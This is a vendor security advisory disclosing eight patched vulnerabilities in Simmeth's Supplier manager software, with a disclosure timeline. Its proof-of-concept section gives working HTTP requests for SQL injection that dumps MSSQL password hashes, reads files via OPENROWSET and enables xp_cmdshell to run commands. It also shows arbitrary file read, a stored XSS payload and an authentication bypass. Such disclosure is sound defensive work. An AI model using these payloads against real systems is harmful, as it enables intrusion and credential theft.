SEC Consult Vulnerability Lab Security Advisory < 20221109-0 >
=========================& SEC Consult Vulnerability Lab Security Advisory < 20221109-0 >
=======================================================================
title: Multiple Critical Vulnerabilities
product: Simmeth System GmbH Supplier manager (Lieferantenmanager)
vulnerable version: < 5.6
fixed version: 5.6
CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014,
CVE-2022-44015, CVE-2022-44016, CVE-2022-44017
impact: critical
homepage: https://www.simmeth.net
found: 2022-03-01
by: Steffen Robertz (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"We are an innovative B2B software provider for supply chain management,
especially in the areas of supplier management over the entire supplier
lifecycle and quality control, supply chain key figures and reporting.

Our medium-sized family business is a reliable, practice-oriented partner with
an extraordinary wealth of experience: since 2002, our currently more than 70
medium-sized and corporate customers have trusted our solutions and our
pragmatically oriented expertise."

Source: https://www.simmeth.net/en/company/about-us


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

An in-depth security analysis performed by security professionals is
highly advised, to identify and resolve potential further critical security
issues.  


Vulnerability overview/description:
-----------------------------------
1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)
An attacker can inject raw SQL queries. By activating MSSQL features, the
attacker is able to execute arbitrary commands on the MSSQL server.

2) Faulty API Design (CVE-2022-44014)
A faulty API design allows an attacker to fetch arbitrary SQL tables per
design. This will leak all user passwords and MSSQL hashes.

3) Local File Access (CVE-2022-44016)
An attacker can download arbitrary files from the web server by abusing an API
call.

4) Leak of Simmeth's SMTP password
A cleartext password for the email account "LM@simmeth.net" is leaked during
the login process.

5) Stored Cross-Site Scripting (CVE-2022-44012)
An attacker can execute JavaScript code in the browser of the victim if a site
is loaded. The victim's encrypted password can be stolen and most likely be
decrypted.

6) Authentication Bypass (CVE-2022-44013)
An attacker can access multiple API calls without authentication. Thus, all
outlined attacks can be executed without knowing any valid credentials.

7) Errors in Session management (CVE-2022-44017)
Due to errors in the session management, an attacker can log back into a
victim's account after the victim logged out. This is due to the credentials not
being cleaned from the local storage after logout.

8) Information Disclosure
Multiple requests were giving verbose error messages. This helps an attacker in
finding and abusing a vulnerability.


Proof of concept:
-----------------
1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)
Following API call can be used to execute arbitrary SQL queries via a subquery
or stacked query in the table name. Because of vulnerability 6, only a valid
username is required to send the request.

---------------------------------
POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1
Content-Length: 1264
[...]

{
"Credential": {
"Mandant": {
"ConfigPath": "C:\SSG\50_Konfigurationen\LM.xml",
"ConnectionString": {
"Available": false,
"System": "****"
},
"Encryption": 1,
"IsWithRegistration": true,
"Name": "****"
},
"Username": "simmeth",
"System": "****"
},
"ResultTab": {
"AutoLoad": false,
"Createable": true,
"Databases": [
{
"System": "****",
"Tables": [
{
"Columns": [],
"Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",
"Relations": [],
"Results": [
{
"ColumnName": "*"
}
]
}
]
}
],
"Name": "Results",
"PageSize": 2000
},
"Ids": {},
"SecondaryIds": {},
"Constraints": [],
"DateConstraints": {},
"LogicOperator": 0,
"PageNumber": 0,
"Sortings": {},
"TableFilters": {},
"GroupByField": null,
"Aggregates": {},
"isExport": false
}

-------------------
The POC above shows an example subquery, which will respond with the resulting
dataset. Stacked queries will be executed, however, the results will not be
contained in the web server's reply. The example query will dump the MSSQL password
hashes.

Further attacks include arbitrary file read with the following query:

(SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents
)sub;--

And code execution via the xp_cmdshell extended procedure:

(SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1;
RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell
'nslookup some.domain';--


2) Faulty API Design (CVE-2022-44014)
The API design allows the frontend to supply an arbitrary table name
(called <TABLE NAME HERE> in the POC below) into the following request.
Because of vulnerability 6, only a valid username is required to send the
request.

---------------------------------
POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1
Content-Length: 1264
[...]

{
"Credential": {
"Mandant": {
"ConfigPath": "C:\SSG\50_Konfigurationen\LM.xml",
"ConnectionString": {
"Available": false,
"System": "****"
},
"Encryption": 1,
"IsWithRegistration": true,
"Name": "****"
},
"Username": "simmeth",
"System": "****"
},
"ResultTab": {
"AutoLoad": false,
"Createable": true,
"Databases": [
{
"System": "****",
"Tables": [
{
"Columns": [],
"Name": "<TABLE NAME HERE>",
"Relations": [],
"Results": [
{
"ColumnName": "*"
}
]
}
]
}
],
"Name": "Results",
"PageSize": 2000
},
"Ids": {},
"SecondaryIds": {},
"Constraints": [],
"DateConstraints": {},
"LogicOperator": 0,
"PageNumber": 0,
"Sortings": {},
"TableFilters": {},
"GroupByField": null,
"Aggregates": {},
"isExport": false
}

-------------------

This is a fault by design, as the attacker has full control of the table
name. Therefore, an arbitrary table such as the user table
(ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read.


3) Local File Access (CVE-2022-44016)
The "GetImages" API call can be abused to read arbitrary files from the file
system. This is due to the API allowing to set the image path from the
frontend.

By pointing the base path to C:, all files can be accessed.
Because of vulnerability 6, the request requires no credentials.

-----------------------
POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1
Content-Length: 229
[...]

{"Credential":{
"Mandant":{
"ConfigPath":"C:\SSG\50_Konfigurationen\LM.xml"
},
},
"ImagesPath":"C:\",
"ListImageNames":[
"Windows\win.ini",
"boot.ini",
"Windows\system32\eula.txt",
"Windows\System32\drivers\etc\hosts"
]
}
--------------------
The files are returned base64 encoded. Thus, even binary data can be extracted
from the server.


4) Leak of Simmeth's SMTP password
The following API call will return the current configuration. The configuration
seems to contain cleartext credentials from Simmeth's SMTP server. The
request does not require any credentials.

-----------------
POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1
Content-Length: 70
Content-Type: application/json


{
"Mandant":{"ConfigPath":"C:\SSG\50_Konfigurationen\LM.xml",}
}
----------------

The server responds with:

---------------
[...]
"KPIIntro":{
"IsAccessLog":true,
"MailSettings":{
"Host":"vwp4261.webpack.hosteurope.de",
"IsAuthentification":true,
"IsSSL":false,
"LoginName":"wp10481666-supply",
"Password":"K***********a",
"Port":"25",
"Sender":"LM@simmeth.net"
[...]
--------------
Thus, an attacker could send phishing mails from an official Simmeth account.


5) Stored Cross-Site Scripting (CVE-2022-44012)
The following request can be used to store JavaScript code into the database. It
will be fetched and executed in the victim's browser, once the site is visited.
Because of vulnerability 6, only a valid username is required to send the request.

--------------
POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1
Content-Length: 3311

{"Credential":{"Mandant":{"ConfigPath":"C:\SSG\50_Konfigurationen\LM.xml","ConnectionString
":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},
"Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName"
:"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=x
onerror=alert(document.domain)>test","Lie_ID":4167},
[...]
---------------

The XSS can be used to steal the encrypted passwords from the local storage.
As the API uses cleartext passwords with every request, it is most likely
possible to exfiltrate the passwords in cleartext as well.


6) Authentication Bypass (CVE-2022-44013)
All API calls start by supplying the Credential Object.
----------------
"Credential": {
"Mandant": {
"ConfigPath": "C:\SSG\50_Konfigurationen\LM.xml",
"ConnectionString": {
"Available": false,
"System": "****"
},
"Encryption": 1,
"IsWithRegistration": true,
"Name": "****"
},
"Username": "simmeth",
"Password: "*********"
"System": "****"
},

----------------
However, the password can just be removed. It seems to be only checked on the
login API call. Thus, all requests can be made with just a username. The tested
environment contained a User called "simmeth".
Most likely this is a default user and thus always available, lowering the
requirements for authenticated requests even further.


7) Errors in Session management (CVE-2022-44017)
An attacker can abuse a session management vulnerability in order to log back
into a user account after the user logged out.
The encrypted password and username saved in the local storage of the
web browser is not cleared on logout and always stays valid. Hence, only the state
of the frontend state changes and the user appears to be logged out.
An attacker can force the frontend state back into the logged in state by
visiting: https://<your-host>/LMS/LM/#main


8) Information Disclosure
The application replies with verbose error messages, when triggering
exceptions. This can help an attacker to gain knowledge about the backend and
aid in the development of exploits.
Entering e.g. a single apostrophe into the table name of vulnerability 2 will
cause the web server to print a full stack trace as well as the rest of the SQL
query. Hence, the SQL statement can easily be updated to execute properly.


Vulnerable / tested versions:
-----------------------------
The test was conducted in version 5.4 which was found to be vulnerable.


Vendor contact timeline:
------------------------
2022-04-01: Contacting vendor through info@simmeth.net
2022-04-01: Simmeth requested to know in which customer's environment the
vulnerabilities were discovered.
2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth.
2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already
contains fixes. SEC Consult requests the version number of the fixed version.
2022-04-06: Simmeth communicates the fixed version numbers, advisory is being sent per
unencrypted email.
2022-04-07: Simmeth will verify if all vulnerabilities are already fixed.
2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new
and currently being fixed.
2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities.
A new API will be created until the end of the year.
2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed.
2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take
until end of July.
2022-09-02: Asking about CVE numbers and if all customers are patched.
2022-09-05: Some customers are not yet patched. Current version is phased out by the
end of september. All customers will have to upgrade until then. SEC Consult
will request CVE numbers.
2022-10-05: Requested status update.
2022-10-17: All customers are updated.
2022-11-09: Coordinated release of security advisory.


Solution:
---------
The vendor provides a patched version 5.6 which fixes the identified
security issues. Please approach your vendor support contact in order to receive
the patches.


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF S. Robertz / @2022